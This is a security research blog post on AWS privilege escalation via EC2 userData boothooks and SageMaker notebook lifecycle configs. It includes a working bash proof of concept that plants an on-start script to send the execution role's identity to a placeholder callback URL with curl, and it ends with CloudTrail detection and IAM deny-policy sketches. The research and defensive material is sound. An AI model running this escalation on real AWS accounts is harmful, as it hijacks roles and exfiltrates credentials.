Privilege escalation with SageMaker and there's more hiding in execution roles

How we vibin’ young people? I am not a young person, but I know that’s how you speak, no cap.

In 2016, pre-back injuries and naps, I found a fun little privilege escalation path in EC2. It’s pretty simple: if an attacker can call ec2:StartInstances and ec2:StopInstances and also ec2:ModifyInstanceAttribute on an existing EC2 instance, they can get the privileges of its instance profile (AKA execution role).

Here’s how it works. There’s an out-of-band way to modify the code on the instance using the management API. One of the attributes you can set on an instance using ec2:ModifyInstanceAttribute is userData. This attribute is special because it holds code that is executed on first boot. However, if you put a #cloud-boothook directive in it, the code executes on every boot. So a clever attacker can stop an instance, pop the boot hook in there, drop some credential-stealing code, and start the instance again. Voilà, their code runs in the context of the instance, and they get the creds for that context.
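If you want to see whether an instance’s user data is already set up to run on every boot, a rough check might look like the sketch below. It assumes the boothook directive sits on the first line of the decoded user data, and the helper names (is_boothook, fetch_user_data), the region, and the instance ID are all made up for illustration.

```shell
# Sketch: decide whether decoded EC2 user data is a cloud-init boothook.
# Assumption: the "#cloud-boothook" directive is the first line of the user data.

# Reads decoded user data on stdin; exits 0 if the first line is the directive.
is_boothook() {
  first_line=$(head -n 1)
  [ "$first_line" = "#cloud-boothook" ]
}

# Hypothetical helper: fetch and decode the user data of one instance.
# Needs ec2:DescribeInstanceAttribute; $1 is a region, $2 an instance ID.
fetch_user_data() {
  aws ec2 describe-instance-attribute \
    --region "$1" \
    --instance-id "$2" \
    --attribute userData \
    --query 'UserData.Value' \
    --output text | base64 --decode
}

# Usage (placeholders, not run here):
#   fetch_user_data us-east-1 i-0123456789abcdef0 | is_boothook && echo "runs on every boot"
```

An instance with no user data at all will not decode to anything useful, so treat a failure of the pipeline as "nothing to see" rather than a verdict.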

This felt like a special case back then, and I can’t recall seeing anything similar since. However, I’ve been fighting service-linked roles, execution roles, and SageMaker for the last couple of weeks and ran into another example or two.

SageMaker privilege escalation

First of all, what on earth is this SageMaker thing?! I mean really. I still can’t figure it out.

The artist formerly known as Amazon SageMaker, now the much clearer and more obvious Amazon SageMaker AI, comes with this explanation: “The next generation of Amazon SageMaker is the center for all your data, analytics, and AI”.

It’s 5 services according to the AWS service reference (sagemaker, sagemaker-data-science-assistant, sagemaker-geospatial, sagemaker-mlflow, sagemaker-unified-studio-mcp) and a different 6 according to its API models (sagemaker, sagemaker-a2i-runtime, sagemaker-edge, sagemaker-geospatial, sagemaker-metrics).

In the web console it’s much more obvious what it is and the difference between the options:

Then once you actually try to set it up, there are Instances, Studios, RStudios, Domains, Canvases, Partner Apps, Clusters, Jobs, Models, and on and on. This is the most complex, I’m-gonna-put-all-my-lego-in-a-pile service I have ever seen.

And what’s the point of supporting identity propagation if it doesn’t work on 12 of your lego sets?

But I digress. Back to the privilege escalation.

One of the cool things SageMaker allows you to do is run a managed Jupyter Notebook instance. The marketing team explains that a Notebook instance is a web application for “creating and sharing computational documents”. I think of it as a way of quickly writing dirty, untrusted experimental code and pressing the go button to see what happens when I do.

Under the hood, SageMaker instances are almost certainly just EC2 instances, and EC2 instances and the people that use them need permissions to do stuff. Notebook instances are cooler because of data science, and therefore need even cooler permissions.

If only there were a way to run code on these instances from the management API like we can on EC2? SageMaker has sagemaker:StopNotebookInstance and sagemaker:StartNotebookInstance actions. There’s no sagemaker:ModifyInstanceAttribute, but there is a sagemaker:UpdateNotebookInstance. That’s similar, but it doesn’t take a userData parameter. Hmmm.

For giggles, what do you think this lifecycle-config-name parameter thing is or does? Isn’t it obvious already?

"A lifecycle configuration is a collection of shell scripts that run when you create or start a notebook instance."

I think we can all agree that calling a shell script ‘config’ is the right way to get the compliance team to go away. These pro tips aren’t free, so make sure you sign up for a demo of the Plerion cloud security platform.
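If you’re curious what your own lifecycle “configs” actually contain, something like this sketch could list which config is attached to each notebook and decode its on-start script. The function names are mine, the region and config name are placeholders, and it only looks at the first OnStart entry.

```shell
# Sketch: inspect notebook lifecycle configs. Function names are illustrative.

# Decode a base64-encoded lifecycle script read from stdin.
decode_lifecycle_script() {
  base64 --decode
}

# Print each notebook instance name with its attached lifecycle config name.
# $1 is a region. Needs sagemaker:ListNotebookInstances.
list_notebook_lifecycle_configs() {
  aws sagemaker list-notebook-instances \
    --region "$1" \
    --query 'NotebookInstances[].[NotebookInstanceName,NotebookInstanceLifecycleConfigName]' \
    --output text
}

# Print the decoded on-start script of one lifecycle config.
# $1 is a region, $2 a lifecycle config name.
show_on_start_script() {
  aws sagemaker describe-notebook-instance-lifecycle-config \
    --region "$1" \
    --notebook-instance-lifecycle-config-name "$2" \
    --query 'OnStart[0].Content' \
    --output text | decode_lifecycle_script
}

# Usage (placeholders, not run here):
#   list_notebook_lifecycle_configs us-east-1
#   show_on_start_script us-east-1 my-lifecycle-config
```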

Putting it all together, since all the ingredients are there, just with different names, the privilege escalation is the same:

1. Stop an existing notebook instance.

2. Create a lifecycle config with the AWS credential exfiltration code, or whatever else.

3. Update the notebook instance with the new lifecycle config.

4. Start the notebook instance.

5. Wait for credentials to be delivered or privileged actions executed.

That’s it. API actions have been executed in the context of a different IAM principal, using a role the attacker was never authorized to use.

Here’s some proof of concept code I wrote in a SageMaker notebook:

#!/usr/bin/env bash
set -euo pipefail

REGION="[your-aws-region]"
NOTEBOOK_NAME="[your-notebook-name]"
LC_NAME="[your-lifecycle-config-name]"
CALLBACK_URL="[https://example.com/your-endpoint]"

echo "Checking if lifecycle config '$LC_NAME' exists..."

set +e
aws sagemaker describe-notebook-instance-lifecycle-config \
  --region "$REGION" \
  --notebook-instance-lifecycle-config-name "$LC_NAME" >/dev/null 2>&1
EXISTS=$?
set -e

if [ "$EXISTS" -eq 0 ]; then
  echo "Lifecycle config '$LC_NAME' already exists. Skipping creation."
else
  echo "Lifecycle config '$LC_NAME' does not exist. Creating now..."

  # Build lifecycle script
  LIFECYCLE_SCRIPT=$(cat <<EOF
#!/bin/bash
set -e

IDENTITY_JSON=\$(aws sts get-caller-identity --output json 2>/tmp/sts_err || true)

if [ -n "\$IDENTITY_JSON" ]; then
  curl -sS -X POST \
    -H "Content-Type: application/json" \
    -d "\$IDENTITY_JSON" \
    "$CALLBACK_URL" \
    >/tmp/postbin_out 2>&1 || true
fi
EOF
)

  # Base64-encode the script; tr strips the line wrapping that GNU base64 adds (macOS base64 does not wrap)
  ENCODED_SCRIPT=$(printf '%s' "$LIFECYCLE_SCRIPT" | base64 | tr -d '\n')

  aws sagemaker create-notebook-instance-lifecycle-config \
    --region "$REGION" \
    --notebook-instance-lifecycle-config-name "$LC_NAME" \
    --on-start "[{\"Content\":\"$ENCODED_SCRIPT\"}]"

  echo "Lifecycle config created."
fi

echo "Getting notebook status..."
STATUS=$(aws sagemaker describe-notebook-instance \
  --region "$REGION" \
  --notebook-instance-name "$NOTEBOOK_NAME" \
  --query 'NotebookInstanceStatus' \
  --output text)

echo "Current notebook status: $STATUS"

if [ "$STATUS" = "InService" ]; then
  echo "Stopping notebook..."
  aws sagemaker stop-notebook-instance \
    --region "$REGION" \
    --notebook-instance-name "$NOTEBOOK_NAME"

  aws sagemaker wait notebook-instance-stopped \
    --region "$REGION" \
    --notebook-instance-name "$NOTEBOOK_NAME"
else
  echo "Notebook not running, skipping stop."
fi

echo "Attaching lifecycle config..."
aws sagemaker update-notebook-instance \
  --region "$REGION" \
  --notebook-instance-name "$NOTEBOOK_NAME" \
  --lifecycle-config-name "$LC_NAME"

echo "Waiting for notebook to become Stopped after update..."
aws sagemaker wait notebook-instance-stopped \
  --region "$REGION" \
  --notebook-instance-name "$NOTEBOOK_NAME"

echo "Starting notebook..."
aws sagemaker start-notebook-instance \
  --region "$REGION" \
  --notebook-instance-name "$NOTEBOOK_NAME"

echo "Done. Lifecycle config attached and notebook restarting."

Generalized privilege escalation pattern with execution roles

Can we generalize further and elsewhere? Probably. (I think it works for SageMaker Studios too, hehe).

Typically, you can’t pass around different privileges like this in AWS unless you have been authorized to do so. That is what the PassRole permission was designed to control. This type of privilege escalation works for two reasons:

1. The PassRole check happens at configuration time. That is, when you call an API that sets the execution role for a particular resource, that’s the moment the check is performed. Then and only then.

2. There are sometimes paths to modify what actions will be taken, most notably in the form of custom code, after execution role configuration time. This disentangles the PassRole check from the privileged actions it was meant to gate.

If you want to be a clever little hacker, you can probably scour all the API models in AWS, look for where execution roles are used, and then methodically review them for the second reason above. You’d quickly come across lambda:UpdateFunctionCode to change function code after initial setup and lambda:UpdateFunctionConfiguration to add layers that will auto execute when the function runs. Lucian Patian recently (re)discovered, as Erik Steringer and Marco Slaviero had before him, that this pattern applies to the cloudformation:CreateChangeSet plus cloudformation:ExecuteChangeSet combination.
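A lazy first pass at that scouring could be a text search over the API models for role-shaped parameters. The sketch below assumes you have a local directory of uncompressed JSON service models (if your copy ships them compressed, decompress first), and that role parameters are named something ending in RoleArn. Both are my assumptions, and the match is a crude heuristic that will miss differently named parameters.

```shell
# Sketch: list model files that declare a member whose name ends in "RoleArn".
# Assumption: $1 is a directory tree of uncompressed JSON API model files.
find_role_parameters() {
  grep -rlE '"[A-Za-z]*RoleArn"[[:space:]]*:' "$1" | sort
}

# Usage (hypothetical path, not run here):
#   find_role_parameters ./api-models
```

Every file it prints is a service worth a manual look for “can I change what runs after the role was set?”.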

Enjoy the hunt!

Prevention and detection

If you’re wondering how to spot this happening in the wild, the indicators are fairly straightforward. In both the EC2 and SageMaker versions, the attacker isn’t stealing credentials out of thin air; they’re modifying something that shouldn’t normally change: userData on EC2 or the lifecycle config on a Notebook. In CloudTrail, look for unusual patterns of StopInstances → ModifyInstanceAttribute → StartInstances on EC2, or StopNotebookInstance → UpdateNotebookInstance → StartNotebookInstance on SageMaker (possibly with a CreateNotebookInstanceLifecycleConfig somewhere before the update), especially when done by identities that don’t normally manage that specific compute.
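As a rough idea of what that SageMaker check could look like, here’s a sketch that scans already-exported events for the Stop → Update → Start sequence. The input format is my own invention: tab-separated rows of time, principal, event name, and notebook name, sorted oldest first. How you get CloudTrail into that shape (aws cloudtrail lookup-events, Athena, your SIEM) is up to you.

```shell
# Sketch: flag Stop -> Update -> Start sequences on the same notebook by the
# same principal. Input on stdin (assumed format, oldest first):
#   time<TAB>principal<TAB>eventName<TAB>notebookName
# Output: principal<TAB>notebookName<TAB>time of the StartNotebookInstance call
detect_stop_update_start() {
  awk -F '\t' '
    {
      key = $2 FS $4
      if ($3 == "StopNotebookInstance") {
        state[key] = 1                      # saw a stop
      } else if ($3 == "UpdateNotebookInstance" && state[key] >= 1) {
        state[key] = 2                      # saw stop, then update
      } else if ($3 == "StartNotebookInstance") {
        if (state[key] == 2) print $2 "\t" $4 "\t" $1
        state[key] = 0                      # sequence finished or broken
      }
    }
  '
}
```

This only catches the full three-step sequence from a single principal. A notebook that was already stopped skips the first event, and an attacker could split the calls across identities, so treat it as a starting point for a real detection.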

From a prevention perspective, the fix is equally boring: reduce who can modify the boot-time configuration and enforce a tight boundary around ec2:ModifyInstanceAttribute, sagemaker:UpdateNotebookInstance, and lifecycle config management. And if you really want to be fancy, require approvals or out-of-band review on any config-change-then-start pattern. The TL;DR: treat any ability to change startup code as equivalent to “run arbitrary code as the execution role,” because that’s exactly what it is.
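One way to draw that boundary might be an explicit deny on the startup-code-changing actions for everyone except a tagged group of admins. The sketch below just prints such a policy document. The compute-admin principal tag is hypothetical, and denying ec2:ModifyInstanceAttribute outright is broader than userData alone, so expect to tune it before it goes anywhere near production.

```shell
# Sketch: print an IAM policy document that denies changing startup code
# unless the caller carries a (hypothetical) compute-admin=true principal tag.
print_startup_code_guardrail() {
  cat <<'EOF'
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "DenyStartupCodeChanges",
      "Effect": "Deny",
      "Action": [
        "ec2:ModifyInstanceAttribute",
        "sagemaker:UpdateNotebookInstance",
        "sagemaker:CreateNotebookInstanceLifecycleConfig",
        "sagemaker:UpdateNotebookInstanceLifecycleConfig"
      ],
      "Resource": "*",
      "Condition": {
        "StringNotEquals": {
          "aws:PrincipalTag/compute-admin": "true"
        }
      }
    }
  ]
}
EOF
}

# Usage (policy name is a placeholder, not run here):
#   aws iam create-policy \
#     --policy-name deny-startup-code-changes \
#     --policy-document "$(print_startup_code_guardrail)"
```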

Isn’t it beautiful outside today?

30°C (86°F) in Sydney today. A perfect day. So I used this opportunity to email the AWS Vulnerability Disclosure Program (VDP) to let them know of the great tragedy of this privilege escalation. Here’s what they had to say:

[Edit coming soon, I can feel it]

I don’t know if I would classify this as a vulnerability. Would you? This feels more like an unfortunate side effect of the design choices of the platform. Some slightly older friends might call it an architecture flaw. Regardless, there’s no panic required. Just look out for these privilege combinations when you are building your castle in the clouds.

By the way, there’s been an immense amount of work over the years on AWS privesc. Much, not all, has been collated or linked on HackingTheCloud, so go check that out if you are interested in the topic.

Daniel Grzelak
